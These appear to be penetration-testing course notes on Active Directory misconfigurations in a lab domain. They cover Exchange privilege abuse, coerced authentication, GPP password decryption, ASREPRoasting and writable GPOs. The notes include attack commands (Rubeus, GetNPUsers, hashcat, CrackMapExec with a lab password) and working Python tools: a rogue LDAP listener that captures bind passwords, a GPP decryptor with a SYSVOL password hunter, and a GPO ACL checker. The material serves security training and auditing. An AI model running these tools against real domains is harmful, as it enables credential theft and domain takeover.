
Miscellaneous Misconfigurations

A collection of commonly overlooked AD misconfigurations that can provide initial footholds, credential harvesting, or privilege escalation opportunities.

Default Exchange installations grant excessive privileges within the domain.

Exchange Windows Permissions

  • Not a protected group, but its members hold WriteDacl on the domain object
  • That right can be used to grant any principal DCSync privileges (Replicating Directory Changes / Replicating Directory Changes All)
  • Attackers can add accounts to it via a DACL misconfiguration or through a compromised Account Operators member
  • It is common to find regular users and even computer accounts as members

Organization Management

  • Effectively the “Domain Admins” of Exchange: members can access every domain user’s mailbox
  • Has full control over the OU Microsoft Exchange Security Groups (which contains Exchange Windows Permissions), so it can add members to that group
  • Sysadmins are frequently members

PrivExchange

Flaw in the Exchange Web Services PushSubscription feature: any domain user with a mailbox can make the Exchange server authenticate (NTLM over HTTP) to an arbitrary host. Because the Exchange computer account held WriteDacl on the domain object before the February 2019 cumulative updates, relaying that authentication to LDAP on a DC lets the attacker grant themselves DCSync rights and dump NTDS.DIT; the authentication can also be relayed to other hosts. The result is Domain Admin from any authenticated domain user with a mailbox.

Credential Harvesting

Compromising an Exchange server often yields tens to hundreds of cleartext credentials or NTLM hashes from users logging into OWA.

Printer Bug (MS-RPRN)

Flaw in the Print System Remote Protocol (MS-RPRN). Any domain user can connect to the spooler’s named pipe (\pipe\spoolss) via RpcOpenPrinter and call RpcRemoteFindFirstPrinterChangeNotificationEx to make the server authenticate, as its machine account and over SMB, to any host the attacker names.

The Print Spooler service runs as SYSTEM and is enabled by default on Windows servers installed with Desktop Experience, domain controllers included.

Attack Uses

  • Relay the coerced machine-account authentication to LDAP to grant DCSync privileges
  • Relay it to LDAP to configure Resource-Based Constrained Delegation (RBCD) from a controlled computer account to the coerced host
  • Compromise a DC in a partner domain/forest: if the attacker controls a host with unconstrained delegation and the trust allows TGT delegation, the coerced DC authentication delivers the DC’s TGT

Enumeration

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

MS14-068 (Kerberos PAC Validation)

Flaw in Kerberos (CVE-2014-6324) in which the KDC accepted forged PACs because it validated PAC signatures with weak, unkeyed checksum types. Standard domain user credentials can be escalated to Domain Admin by presenting the user as a member of Domain Admins in a crafted PAC.

Tools: PyKEK (Python Kerberos Exploitation Kit), Impacket (goldenPac.py)

Defense: patching (MS14-068, November 2014). See HTB box “Mantis” for a practical example.

Sniffing LDAP Credentials

Many applications and printers store LDAP credentials in their web admin consoles (often reachable with weak/default passwords). Two approaches:

  1. View in cleartext if the admin console exposes the password
  2. Redirect the test connection: change the configured LDAP server address to the attack host and listen on TCP 389 (e.g., with netcat). Devices that use a simple bind send the DN and password in cleartext during the connection test; if the device insists on LDAPS, a TLS-terminating listener is needed instead

LDAP service accounts are frequently privileged. Even if not, they provide a domain foothold.
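The “redirect the test connection” step above, as an added example that is not code from the original page: a minimal parser for the LDAPv3 simple BindRequest the device sends, plus a one-connection listener around it. The sample request is constructed inline; the DN and password in it are placeholders.

```python
import socket

# Minimal BER helpers, enough for an LDAPv3 BindRequest (RFC 4511, section 4.2)
SEQUENCE, INTEGER, OCTET_STRING = 0x30, 0x02, 0x04
BIND_REQUEST = 0x60        # [APPLICATION 0], constructed
SIMPLE_AUTH = 0x80         # authentication CHOICE: simple [0], primitive


def _encode_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _encode_len(len(body)) + body


def _int(n: int) -> bytes:
    # two's-complement INTEGER; the extra byte keeps values >= 128 positive
    return _tlv(INTEGER, n.to_bytes((n.bit_length() + 8) // 8, "big"))


def _read_tlv(buf: bytes, pos: int):
    """(tag, value, position after the element) for the BER element at buf[pos]."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def build_simple_bind(message_id: int, dn: str, password: str) -> bytes:
    """The bytes a client (or a printer's 'test LDAP connection') sends for a simple bind."""
    bind = _tlv(BIND_REQUEST,
                _int(3)                                   # version 3
                + _tlv(OCTET_STRING, dn.encode())         # name: LDAPDN
                + _tlv(SIMPLE_AUTH, password.encode()))   # simple password, cleartext
    return _tlv(SEQUENCE, _int(message_id) + bind)


def parse_simple_bind(data: bytes) -> dict:
    """Extract DN and password from a simple BindRequest; refuse anything else."""
    tag, msg, _ = _read_tlv(data, 0)
    if tag != SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, mid, pos = _read_tlv(msg, 0)
    if tag != INTEGER:
        raise ValueError("missing messageID")
    tag, bind, _ = _read_tlv(msg, pos)
    if tag != BIND_REQUEST:
        raise ValueError("protocolOp is not a BindRequest (tag 0x%02x)" % tag)
    tag, version, pos = _read_tlv(bind, 0)
    tag, dn, pos = _read_tlv(bind, pos)
    tag, cred, _ = _read_tlv(bind, pos)
    if tag != SIMPLE_AUTH:
        raise ValueError("SASL bind: no cleartext password in this message")
    return {"message_id": int.from_bytes(mid, "big"),
            "version": int.from_bytes(version, "big"),
            "dn": dn.decode(errors="replace"),
            "password": cred.decode(errors="replace")}


def capture_bind(port: int = 389, host: str = "0.0.0.0") -> dict:
    """Listen once, read the first LDAP message the device sends and return the credentials.
    Needs root (or CAP_NET_BIND_SERVICE) for port 389; then press the console's test button."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            creds = parse_simple_bind(conn.recv(4096))
            creds["peer"] = peer[0]
            return creds


if __name__ == "__main__":
    # Offline demo on a constructed request; placeholder DN and password
    sample = build_simple_bind(1, "CN=ldapsvc,OU=Service Accounts,DC=inlanefreight,DC=local", "Ldap!2019")
    print(parse_simple_bind(sample))
```

Compared with a raw netcat listener this tells you immediately whether the device performed a simple bind (password recovered) or a SASL bind such as NTLM or GSSAPI, in which case the capture has to be handled as a relay or hash capture instead.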

Enumerating DNS Records

adidnsdump enumerates all DNS records in a domain via LDAP. By default, any domain user can list the child objects of a DNS zone, but some of those dnsNode objects are not readable by low-privileged users, so a normal LDAP query returns their names without the record data. adidnsdump lists those “hidden” records and, with -r, resolves them with ordinary DNS queries.

Useful when host naming conventions are non-descriptive (e.g., SRV01934) — DNS records may reveal meaningful names like JENKINS.INLANEFREIGHT.LOCAL.

Usage

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
head records.csv

# Resolve unknown records
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r
head records.csv

Password in Description Field

Account passwords are sometimes stored in the user Description or Notes field.

Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}

PASSWD_NOTREQD Flag

Accounts with PASSWD_NOTREQD set in userAccountControl are exempt from the domain password policy’s minimum length requirement. They may have a very short password, or no password at all, since the DC accepts an empty password for such accounts.

This flag is often set by vendor installers and never removed. Always enumerate and test these accounts, and report the finding regardless.

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

Credentials in SMB Shares and SYSVOL Scripts

The SYSVOL share’s scripts directory is readable by all authenticated users. Hunt for passwords in batch, VBScript, and PowerShell scripts.

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts

Found passwords (e.g., local admin credentials in reset_local_admin_pass.vbs) can be sprayed across the domain using CrackMapExec with --local-auth.

Group Policy Preferences (GPP) Passwords

GPP XML files in SYSVOL (drives.xml, printers.xml, services.xml, scheduledtasks.xml, Groups.xml, and others) can contain a cpassword attribute. It is AES-256 encrypted, but with a static key that Microsoft published in the MSDN documentation, so any domain user who can read SYSVOL can decrypt it.

Patched in 2014 (MS14-025), which stopped new passwords from being saved in preferences but did not remove existing files. Copies can also persist in the local GPP cache on client machines even after the policy is deleted (rather than unlinked).

Decrypting

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
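Added example for the SYSVOL script hunt and the GPP decryption above; it is not code from the original page. It reproduces gpp-decrypt’s algorithm in Python (needs the cryptography package) and runs it, together with a regex pass over scripts, across a constructed in-memory SYSVOL tree. The file contents, account names and script passwords are made up; the cpassword in the sample Groups.xml is the one shown above, and the policy GUID is a placeholder.

```python
import base64
import re
import xml.etree.ElementTree as ET
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Static AES-256 key Microsoft documented for GPP cpassword; identical in every domain
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
ZERO_IV = b"\x00" * 16


def gpp_decrypt(cpassword: str) -> str:
    """Same steps as gpp-decrypt: restore base64 padding, AES-256-CBC with a zero IV,
    strip PKCS#7 padding, decode the UTF-16LE plaintext."""
    blob = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    dec = Cipher(algorithms.AES(GPP_KEY), modes.CBC(ZERO_IV)).decryptor()
    plain = dec.update(blob) + dec.finalize()
    return plain[: -plain[-1]].decode("utf-16-le")


def gpp_encrypt(password: str) -> str:
    """Inverse of the above, so the decoder can be checked without a real SYSVOL."""
    data = password.encode("utf-16-le")
    pad = 16 - len(data) % 16
    enc = Cipher(algorithms.AES(GPP_KEY), modes.CBC(ZERO_IV)).encryptor()
    ct = enc.update(data + bytes([pad]) * pad) + enc.finalize()
    return base64.b64encode(ct).decode().rstrip("=")       # GPP drops the '=' padding


# Attributes that name the account in the GPP item types that carry a cpassword
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")


def find_cpasswords(xml_text: str, path: str) -> list:
    """Every <Properties cpassword="..."> in a GPP file, decrypted."""
    hits = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cp = props.attrib.get("cpassword")
        if not cp:                       # attribute absent or empty: no password stored
            continue
        user = next((props.attrib[a] for a in ACCOUNT_ATTRS if a in props.attrib), "?")
        hits.append({"file": path, "kind": "gpp", "user": user, "secret": gpp_decrypt(cp)})
    return hits


# The usual ways scripts embed a password (case-insensitive); each pattern captures the secret
SCRIPT_PATTERNS = (
    re.compile(r"""(?i)(?:password|passwd|pwd)\s*[=:]\s*["']?([^\s"']+)"""),   # strPassword = "..."
    re.compile(r"(?i)net\s+user\s+\S+\s+(\S+)\s+/add"),                        # net user NAME PASS /add
    re.compile(r"(?i)/user:\S+\s+(\S+)"),                                        # net use ... /user:DOM\u PASS
    re.compile(r"""(?i)ConvertTo-SecureString\s+["']([^"']+)["']"""),           # PowerShell literal
)


def find_script_secrets(text: str, path: str) -> list:
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pat in SCRIPT_PATTERNS:
            m = pat.search(line)
            if m:
                hits.append({"file": path, "kind": "script", "line": lineno, "secret": m.group(1)})
                break
    return hits


def hunt_sysvol(files: dict) -> list:
    """files maps SYSVOL path -> content; in practice read them over SMB from \\\\dc\\SYSVOL."""
    hits = []
    for path, content in files.items():
        low = path.lower()
        if low.endswith(".xml") and "\\preferences\\" in low:
            hits.extend(find_cpasswords(content, path))
        elif low.endswith((".vbs", ".bat", ".cmd", ".ps1")):
            hits.extend(find_script_secrets(content, path))
    return hits


# Constructed sample tree (not real INLANEFREIGHT data)
SAMPLE_SYSVOL = {
    r"\\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs": "\n".join([
        'Set objShell = CreateObject("WScript.Shell")',
        'strPassword = "L0calAdm!n2020"',
        'objShell.Run "net user administrator " & strPassword',
    ]),
    r"\\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\map_drives.bat":
        r"net use H: \\fs01\home /user:INLANEFREIGHT\svc_map Map!Dr1ves /persistent:yes",
    r"\\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\Policies\{EXAMPLE-GUID}\Machine\Preferences\Groups\Groups.xml":
        '<Groups><User name="Administrator (built-in)"><Properties action="U" '
        'cpassword="VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE" '
        'userName="Administrator (built-in)"/></User></Groups>',
}

if __name__ == "__main__":
    for hit in hunt_sysvol(SAMPLE_SYSVOL):
        print(hit)
```

Calling gpp_decrypt on the page’s cpassword reproduces the gpp-decrypt output above. The script patterns are deliberately loose: a few false positives cost seconds, a missed local admin password costs a foothold.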

Automated Discovery

# List available CrackMapExec GPP modules
crackmapexec smb -L | grep gpp

# Find autologon credentials in Registry.xml
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

Other tools: Get-GPPPassword.ps1, Get-GPPAutologon.ps1 (PowerSploit), GPP Metasploit Post Module.

GPP passwords often belong to legacy/disabled accounts, but always try password spraying with recovered passwords — password reuse is common.

ASREPRoasting

Targets accounts with Do not require Kerberos pre-authentication enabled (DONT_REQ_PREAUTH in userAccountControl). Without pre-authentication, anyone who can reach the KDC can request an AS-REP for the account; its encrypted part is derived from the account’s password hash and can be cracked offline.

No SPN is required (unlike Kerberoasting). If you have GenericWrite/GenericAll over an account, you can set this flag, retrieve the AS-REP hash, then clear the flag again.

Enumeration (Windows)

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Attack (Windows — Rubeus)

.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

Attack (Linux — Impacket)

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users

Attack (Linux — Kerbrute)

Kerbrute automatically retrieves the AS-REP for users without pre-auth during user enumeration:

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

Cracking

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt

Even if you can’t crack the hash, report the finding — the misconfiguration itself is worth documenting.

GPO Abuse

If a user/group has write rights over a GPO (WriteProperty, WriteDacl, WriteOwner, or GenericWrite/GenericAll, which include them), they can modify it to:

  • Grant user rights to an account (SeDebugPrivilege, SeTakeOwnershipPrivilege, SeImpersonatePrivilege)
  • Add a user to the local Administrators group on affected hosts
  • Create an immediate scheduled task for code execution

Enumeration

# List all GPOs
Get-DomainGPO | select displayname

# Built-in cmdlet
Get-GPO -All | Select DisplayName

# Check if Domain Users have rights over any GPO
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}

# Resolve GPO GUID to name
Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532

Use BloodHound to visualize GPO relationships and identify affected OUs/computers.
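Added example (not from the page) for the GPO ACL check above: it decodes the ActiveDirectoryRights bitmask that Get-ObjectAcl reports and keeps only the ACEs in which a low-privilege principal (Domain Users, Domain Computers, Authenticated Users, Everyone, BUILTIN\Users) holds a write right. The ACE list mirrors Get-ObjectAcl output but is constructed; the domain SID, the GPO display names and the GUIDs other than the one shown above are placeholders.

```python
import re

# System.DirectoryServices.ActiveDirectoryRights bit values
RIGHTS = {
    0x00001: "CreateChild", 0x00002: "DeleteChild", 0x00004: "ListChildren",
    0x00008: "Self", 0x00010: "ReadProperty", 0x00020: "WriteProperty",
    0x00040: "DeleteTree", 0x00080: "ListObject", 0x00100: "ExtendedRight",
    0x10000: "Delete", 0x20000: "ReadControl", 0x40000: "WriteDacl",
    0x80000: "WriteOwner", 0x100000: "Synchronize",
}
GENERIC_ALL = 0xF01FF        # every bit above
GENERIC_WRITE = 0x20028      # Self | WriteProperty | ReadControl
GENERIC_READ = 0x20094       # ListChildren | ListObject | ReadProperty | ReadControl
WRITE_MASK = 0x00020 | 0x40000 | 0x80000   # any of these lets the holder change or take over the GPO

# Principals every domain member effectively belongs to
WELL_KNOWN = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users",
              "S-1-5-32-545": "BUILTIN\\Users"}
DOMAIN_RIDS = {513: "Domain Users", 515: "Domain Computers"}


def decode_rights(mask: int) -> list:
    if mask & GENERIC_ALL == GENERIC_ALL:
        return ["GenericAll"]
    names = [n for bit, n in sorted(RIGHTS.items()) if mask & bit]
    if mask & GENERIC_WRITE == GENERIC_WRITE:
        names.insert(0, "GenericWrite")
    return names


def low_priv_principal(sid: str):
    """Name of the low-privilege group the SID denotes, or None for anything else."""
    if sid in WELL_KNOWN:
        return WELL_KNOWN[sid]
    m = re.fullmatch(r"S-1-5-21-\d+-\d+-\d+-(\d+)", sid)
    return DOMAIN_RIDS.get(int(m.group(1))) if m else None


def writable_gpos(aces: list, gpo_names: dict) -> list:
    """Allow ACEs that give a low-privilege principal write access to a GPO.
    Simplification: a matching deny ACE earlier in the DACL would override an allow."""
    hits = []
    for ace in aces:
        who = low_priv_principal(ace["SecurityIdentifier"])
        if who is None or ace["AceType"] != "AccessAllowed":
            continue
        if not ace["ActiveDirectoryRights"] & WRITE_MASK:
            continue
        guid = ace["ObjectDN"].split(",")[0][3:]   # "CN={GUID},CN=Policies,..." -> "{GUID}"
        hits.append({"gpo": gpo_names.get(guid, guid), "principal": who,
                     "rights": decode_rights(ace["ActiveDirectoryRights"])})
    return hits


# Constructed sample: placeholder domain SID, GPO names and GUIDs (the first GUID is the one above)
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
POLICIES = "CN=Policies,CN=System,DC=INLANEFREIGHT,DC=LOCAL"
GPO_NAMES = {
    "{7CA9C789-14CE-46E3-A722-83F4097AF532}": "GPO-1",
    "{00000000-0000-0000-0000-000000000002}": "GPO-2",
    "{00000000-0000-0000-0000-000000000003}": "GPO-3",
}
GPO1, GPO2, GPO3 = ("CN=%s,%s" % (g, POLICIES) for g in GPO_NAMES)
SAMPLE_ACES = [
    {"ObjectDN": GPO1, "ActiveDirectoryRights": GENERIC_ALL,
     "SecurityIdentifier": DOMAIN + "-512", "AceType": "AccessAllowed"},   # Domain Admins: expected
    {"ObjectDN": GPO1, "ActiveDirectoryRights": GENERIC_READ,
     "SecurityIdentifier": DOMAIN + "-513", "AceType": "AccessAllowed"},   # Domain Users, read only
    {"ObjectDN": GPO2, "ActiveDirectoryRights": 0x10 | 0x20,
     "SecurityIdentifier": DOMAIN + "-513", "AceType": "AccessAllowed"},   # Domain Users can write
    {"ObjectDN": GPO2, "ActiveDirectoryRights": 0x40000,
     "SecurityIdentifier": "S-1-5-11", "AceType": "AccessDenied"},         # deny ACE, not a finding
    {"ObjectDN": GPO3, "ActiveDirectoryRights": GENERIC_WRITE,
     "SecurityIdentifier": DOMAIN + "-515", "AceType": "AccessAllowed"},   # Domain Computers
]

if __name__ == "__main__":
    for hit in writable_gpos(SAMPLE_ACES, GPO_NAMES):
        print(hit)
```

The Domain Computers case is easy to miss when filtering on a single SID as in the PowerView one-liner: a machine account you already control (or can create under the default machine account quota) is all it takes to use that ACE.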

Exploitation

Use SharpGPOAbuse to leverage writable GPOs. Be careful: GPO changes apply to every computer and user in the linked OUs, so prefer the tool’s options for targeting a specific user or host where they exist, and remove the added settings once you are done.

Audit Tools

group3r, ADRecon, PingCastle — all can audit GPO security.